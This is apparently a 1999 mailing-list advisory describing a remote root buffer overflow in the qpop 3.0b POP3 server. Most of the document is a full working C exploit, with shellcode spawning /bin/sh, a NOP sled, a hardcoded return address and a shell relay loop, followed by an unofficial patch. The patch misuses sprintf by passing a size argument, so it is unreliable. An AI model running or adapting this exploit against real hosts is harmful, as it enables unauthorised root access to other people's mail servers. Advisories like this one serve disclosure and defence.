Greetings,
There is a remote buffer overflow in the qpop 3.0 server code
that can lead to remote root compromise. Exploit attached.
Vulnerable versions are all versions of qpop 3.0b,
affected operating systems are _all_ systems that run it.
Versions 2.52 and 2.53 do not contain this bug.
The latest version available is 3.0b20, which is vulnerable,
along with all previous 3.0 versions.
I advise everyone running qpop3.0b servers to shut down the server
IMMEDIATELY by disabling the entry in inetd.conf and then downgrading
to v2.53 or another program until an official patch has been released.
Details: The buffer overflow(s) are present in pop_msg.c (sounds familiar..)
starting at line 68. All configurations and different builds seem to be
vulnerable, as either vsprintf or sprintf are used, which both do not check
bounds on the input buffers for each argument.
Exploiting: The overflow code should not contain characters 0x0c/x17/x20,
because it would get interpreted as more than one argument and hence fail.
Patching: I included a small patch. You should only use inofficial patches
if you totally need to use version 3.0, otherwise downgrade and wait for a
patch from Qualcomm. IF you patch this by yourself, please consider that
the buffer pointer CHANGES and the buffer is about 30 bytes LESS than the
defined MAXLINELEN!!
PS: The installation file suggests to run qpopper without tcpd, e.g.:
pop3 stream tcp nowait root /usr/local/lib/qpopper qpopper -s
I would NOT suggest doing it that way. Use:
pop3 stream tcp nowait root /usr/sbin/tcpd qpopper -s
instead. At least for me it works behind a tcp wrapper, and that way,
you can use access control and every connection _attempt_ gets logged.
Mixter
________________________
[EMAIL PROTECTED]
members.tripod.com/mixtersecurity
/*
* Qpopper 3.0b remote exploit for x86 Linux (tested on RedHat/2.0.38)
*
* Dec 1999 by Mixter <[EMAIL PROTECTED]> / http://1337.tsx.org
*
* Exploits pop_msg buffer overflow to spawn a remote root shell.
* This probably works with the old qpop2 code for bsd, solaris anyone?
*
* WARNING: YOU ARE USING THIS SOFTWARE ON YOUR OWN RISK. THIS IS A
* PROOF-OF-CONCEPT PROGRAM AND YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU
* DO WITH IT! DO NOT ABUSE THIS FOR ILLICIT PURPOSES!
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#define NOP 0x90
#define LEN 1032
#define CODESTART 880
#define RET 0xbfffd655
/* x86 linux shellcode. this can be a simple execve to /bin/sh on all
systems, but MUST NOT contain the characters 'x17' or 'x0c' because
that would split the exploit code into separate arg buffers */
char *shellcode =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"
"\xe8\xd9\xff\xff\xff/bin/sh";
unsigned long resolve (char *);
void term (int, int);
unsigned long get_sp ();
int
main (int argc, char **argv)
{
char buffer[LEN];
char *codeptr = shellcode;
long retaddr = RET;
int i, s;
struct sockaddr_in sin;
if (argc < 2)
{
printf ("usage: %s <host> [offset]\n", argv[0]);
printf ("use offset -1 to try local esp\n");
exit (0);
}
if (argc > 2)
{
if (atoi (argv[2]) == -1)
{
/* 8000 = approx. byte offset to qpopper's top of stack
at the time it prints out the auth error message */
retaddr = get_sp () - 8000 - LEN;
printf ("Using local esp as ret address...\n");
}
retaddr += atoi (argv[2]);
}
for (i = 0; i < LEN; i++)
*(buffer + i) = NOP;
for (i = CODESTART + 2; i < LEN; i += 4)
*(int *) &buffer[i] = retaddr;
for (i = CODESTART; i < CODESTART + strlen (shellcode); i++)
*(buffer + i) = *(codeptr++);
buffer[0] = 'A';
buffer[1] = 'U';
buffer[2] = 'T';
buffer[3] = 'H';
buffer[4] = ' ';
printf ("qpop 3.0 remote root exploit (linux) by Mixter\n");
printf ("[return address: 0x%lx buffer size: %d code size: %d]\n",
retaddr, strlen (buffer), strlen (shellcode));
fflush (0);
sin.sin_family = AF_INET;
sin.sin_port = htons (110);
sin.sin_addr.s_addr = resolve (argv[1]);
s = socket (AF_INET, SOCK_STREAM, 0);
if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)
{
perror ("connect");
exit (0);
}
switch (write (s, buffer, strlen (buffer)))
{
case 0:
case -1:
fprintf (stderr, "write error: %s\n", strerror (errno));
break;
default:
break;
}
write (s, "\n\n", 1);
term (s, 0);
return 0;
}
unsigned long
resolve (char *host)
{
struct hostent *he;
struct sockaddr_in tmp;
if (inet_addr (host) != -1)
return (inet_addr (host));
he = gethostbyname (host);
if (he)
memcpy ((caddr_t) & tmp.sin_addr.s_addr, he->h_addr, he->h_length);
else
{
perror ("gethostbyname");
exit (0);
}
return (tmp.sin_addr.s_addr);
}
unsigned long
get_sp (void)
{
__asm__ ("movl %esp, %eax");
}
void
term (int p, int c)
{
char buf[LEN];
fd_set rfds;
int i;
while (1)
{
FD_ZERO (&rfds);
FD_SET (p, &rfds);
FD_SET (c, &rfds);
if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1)
return;
if (FD_ISSET (c, &rfds))
{
if ((i = read (c, buf, sizeof (buf))) < 1)
exit (0);
else
write (p, buf, i);
}
if (FD_ISSET (p, &rfds))
{
if ((i = read (p, buf, sizeof (buf))) < 1)
exit (0);
else
write (c, buf, i);
}
}
}
# apply this in the qpopper3.0b20/popper/ directory with patch < qp3b20.patch
--- pop_msg.c.old Mon Nov 29 23:42:03 1999
+++ pop_msg.c Mon Nov 29 23:52:08 1999
@@ -65,7 +65,7 @@
/* Append the message (formatted, if necessary) */
if (format) {
#ifdef HAVE_VPRINTF
- vsprintf(mp,format,ap);
+ vsnprintf(mp,MAXLINELEN - 100, format,ap);
#else
# ifdef PYRAMID
arg1 = va_arg(ap, char *);
@@ -74,9 +74,9 @@
arg4 = va_arg(ap, char *);
arg5 = va_arg(ap, char *);
arg6 = va_arg(ap, char *);
- (void)sprintf(mp,format, arg1, arg2, arg3, arg4, arg5, arg6);
+ (void)sprintf(mp,MAXLINELEN - 100, format, arg1, arg2, arg3, arg4, arg5,
+arg6);
# else
- (void)sprintf(mp,format,((int *)ap)[0],((int *)ap)[1],((int *)ap)[2],
+ (void)sprintf(mp,MAXLINELEN - 100, format,((int *)ap)[0],((int *)ap)[1],((int
+*)ap)[2],
((int *)ap)[3],((int *)ap)[4]);
# endif
#endif
